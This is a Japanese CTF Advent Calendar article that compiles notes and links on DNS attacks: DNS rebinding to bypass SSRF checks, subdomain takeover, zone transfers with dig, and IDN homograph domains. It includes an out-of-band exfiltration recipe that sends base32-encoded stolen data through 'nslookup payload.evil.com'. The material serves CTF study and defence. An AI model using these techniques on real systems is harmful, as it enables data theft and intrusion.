この記事はCTFのWebセキュリティ Advent Calendar 2021の13日目の記事です。

本まとめはWebセキュリティで共通して使えますが、セキュリティコンテスト（CTF）で使うためのまとめです。
悪用しないこと。勝手に普通のサーバで試行すると犯罪です。

DNS

• DNSの歴史
  • DNSの仕組みの基本を理解しよう：DNSの仕組みと運用（1） - ＠IT
    • ここが詳しい。hostsファイルから説明されている
  • インターネットを支え続ける老舗プロトコル、「DNS」30年超の歴史を振り返る【IETFトピックス2016-17】 - INTERNET Watch
    • ここも色々書いてある
• 攻撃・テク一覧
  • DNS Rebinding
  • OOB抽出
  • ドロップキャッチ
    • CTFでは使え無さそうだけど
    • 使われていた有名なドメインが手放されたときに、それをアタッカーが再取得して、有害サイトへのリダイレクトなどに使用すること
    • 例）https://twitter.com/tiketiketikeke/status/1281616549690740738
  • Subdomain Takeover
• 脆弱性
  • DNSpooqの脆弱性詳細と攻撃コード解説 - knqyf263's blog
    • dnsmasqというソフトウェアに関する7つの脆弱性をまとめたもの
• dnsからCNAMEを一括lookupしてくれるやつ
  • GitHub - melbadry9/cname: CNAME records lookup
• TLD
  • .arpa
    • ネットワークのインフラのためだけに利用されている。IPアドレスからホスト名を調べる用途などに使われる
    • in-addr.arpa : IPアドレスからホスト名を逆引きするときに使用する
      • 162.100.51.198.in-addr.arpaをDNSに問い合わせれば、可能ならホスト名が返ってくる
    • ip6.arpa : IPv6でのホスト名逆引きに使用する
• オープンリゾルバ
  • 不適切な設定などにより、インターネット上の不特定の利用者からの再帰問い合わせを受け付けてしまうDNSサーバ
  • Domains having Hidden Open Resolvers

DNS Rebinding

• できること
  • SSRFのバイパスに使える。例えば、「名前解決して127.0.0.1じゃないことを確認→実際に使用」とした場合、1回目で127.0.0.1以外を返して2回目で127.0.0.1を返せばバイパス可能
  • same origin policyを騙す
    • これもSSRFのチェックすり抜けと同様
    • 実行時の同一オリジンポリシーチェックを正しいDNSで乗り切ったあと、実際に使う2回目以降を悪意のあるものにする
    • https://blog.tokumaru.org/2007/11/dns-rebinding.html
• 資料
  • DNS Rebindingを悪用してインターネットからプライベートネットワークへの攻撃 - 忙しい人のためのサイバーセキュリティニュース
    • DNS Rebindingを一言で説明すると「DNSを使用して同一生成元ポリシーを回避する攻撃」
  • DNS Rebinding ～今日の用語特別版～ | 徳丸浩の日記
    • 徳丸さんの絵も分かりやすい
  • 資料 -　ここに色々対策が書いてある
  • DNSリバインディング対策 - Qiita
    • ここも対策？
• CTFで使えるサイト
  • Dashboard - requestrepo.com
    • DNS Recordを作ってvalueを127.0.0.1/11.11.11.11のようにすると、リクエスト毎に127.XX,11.XX,127.XX,11.XX, ...としてくれる
  • rbndr.us dns rebinding service
• 問題
  • CTFtime.org / ASIS CTF Quals 2020 / PyCrypto
  • WreckTheLine writeups Reporter
  • PDF Generator Writeup | DNS Rebinding Attack | TrollCat CTF Writeup | by Bipul Jaiswal | Feb, 2021 | Medium

OOB抽出

• 表記について
  • リアルワールドバグハンティングではOOB抽出と記載されていた
  • Web上では、OOB ExploitationやらOOB Exfiltrationやら曖昧
• 手法
  • 1. SSRFをして抜き出したい情報を掴む
  • 1. base32エンコードをしてpayloadを作る（URLは英数字しか入れられないからbase32にする）
  • 1. DNSサーバを用意する evil.com
  • 1. nslookup payload.evil.comすると、DNS解決をしに行くので、payload込みでevil.comに情報が送られて流出する
• Lab: Blind OS command injection with out-of-band data exfiltration | Web Security Academy

Subdomain Takeover

• どういった悪いことが起こるか
  • 正規のドメインにアクセスしたのに、詐欺サイトなどへ飛ばされてしまう
• 何が起きている？
  • 1. 正規のドメインにアクセス
    2. 正規のドメインであるが、既にメンテされてない古いドメイン
       • この古いドメインをDangling DNS、ぶら下がってるDNSと呼んだりする
    3. 「とあるドメインへのCNAMEレコードが残っている」
  • 1. ドメインのCNAMEにしたがって、あるドメインへ飛ばされる
    2. これがAzureとかのドメインである場合に、そのドメインを何者かが再取得できれば、正規のドメインの先がおかしなことになる
  • 1. あるドメインを攻撃者が再取得して詐欺サイトへリダイレクトさせてるようにしていれば攻撃成立
  • こうすることで…
    • ドメインは正規のものなので正規サイトのように見せることができる
    • XSS可能
• 脆弱なサイト一覧
  • ドメイン毎にSubdomain Takeoverができるかどうかが分かるようだ
  • EdOverflow/can-i-take-over-xyz: "Can I take over XYZ?" — a list of services and how to claim (sub)domains with dangling DNS records.
  • indianajson/can-i-take-over-dns: "Can I take over DNS?" — a list of DNS providers and how to claim (sub)domains via missing hosted zones
  • danielmiessler/SecLists: SecLists is the security tester's companion. It's a collection of multiple types of lists used during security assessments, collected in one place. List types include usernames, passwords, URLs, sensitive data patterns, fuzzing payloads, web shells, and many more.
• インシデント
  • Subdomain Takeoverによる詐欺サイトへの誘導についてまとめてみた - piyolog
    • 攻撃者サイト側のsitemap.xmlに大量のURLが書いてあった。なるほど。攻撃者として抜かりないな。なるほど
    • 話題になったTeamsにも言及しており、セッション奪取の1ピースとして同一ドメインがあったけれど、これを使えば行けたりするのか。なるほど。
• 参考
  • Subdomain Takeover 概観 – やっていく気持ち
  • 5 Subdomain Takeover #ProTips
  • Azure が提供するデフォルトドメイン名を狙った改ざんについて注意喚起 - しばやん雑記

tips

• ドメインを使ってフィルター回避
  • asc war games Filtration Phase. This is the Qualification phase for ASC… | by Mohamed R. Serwah | Aug, 2020 | Medium
  • 127.0.0.1を踏ませたいが、フィルタリングされている場合がある
  • この時に、適当にドメインを取って、127.0.0.1を指すようにすれば、フィルタリングを回避しつつlocalhostを強制できる
• DNSのTXTレコードに情報があるかもしれない
  • windowsならnslookup -q=txt [domain]で見れる
• example.comとexample.com.は同じドメインとして処理される（処理系によるかも。名前解決自体はどちらも同じ結果になる）
• 特殊なTLDをwhoisするときは特殊なサイトを使う必要があるっぽい（？）
  • .xyzならここ Open xINT CTF 2020 write-up - 気が向いたら書く
• TLDである.localについて
  • 2013年にできたMulticast DNSで.localが使われている
  • 余談であるが、慣例でActiveDirectoryでは.localドメインを内部で使用する場合に使っていたが、それと衝突するので、ADでは今後.localは使ってはいけない
    • Active Directoryのドメイン名（".local" はだめなの？）
    • Active Directoryのドメイン名に「.local」を使ってはいけない件 - asohiroblog
• レジストラが狙われた事件
  • ある日突然、自社ドメインが乗っ取られた――“原因も手口も不明”の攻撃に、セキュリティチームはどう立ち向かったか - ITmedia エンタープライズ
• digコマンド
  • 最強 dig axfr cronos.htb axfrをつけるとたどって解決してくれる
  • とりあえずこれ
    • ドメインから dig [domain] any any +multiline
    • IPから dig any any -x [ipaddress]
  • dig @[dns ip] domain q-type q-class q-opt
    • @[dns ip] option. DNSサーバを指定したい時
    • q-type option. 何を取得してくるか
      • any 全部
      • a(default), mx, ns, soa, hinfo, axfr, txt
    • q-class option. どう取ってくるか？
      • any 全部
      • in(default), hs, ch
    • q-opt
      • +trace ルートDNSから確認を行う。たくさん出てくるから読み方勉強せんなん
      • +cmd これは標準でつくっぽい
      • +dnssec DNSSECで問い合わせをする
      • +multiline これをつけると一部見やすくなる
      • +short 最小限だけ表示するので結果を使いたいときに便利
• SRVレコード
  • dig _http_._tcp.[domain] srvで検索できる
  • httpとかtcpを変えると色々見つかる
• ドメインを検索したいときにCTログが使える
  • https://crt.sh/
• IDNホモグラフアタック用ドメイン生成ツール EvilURL | うざ夫のうざブログ
  • GitHub - UndeadSec/EvilURL: Generate unicode evil domains for IDN Homograph Attack and detect them.
    • punycodeによる無茶苦茶判別しにくい見た目一緒なドメインを作るツール
  • IDNとはInternationalized Domain Name
  • 実際こういったドメインが必要なのはまれなので、社内プロキシでpunycodeは一律弾いてもいいのでは
    • xn--で始まるDNSクエリはログを記録し、モニタリングしておくのもいい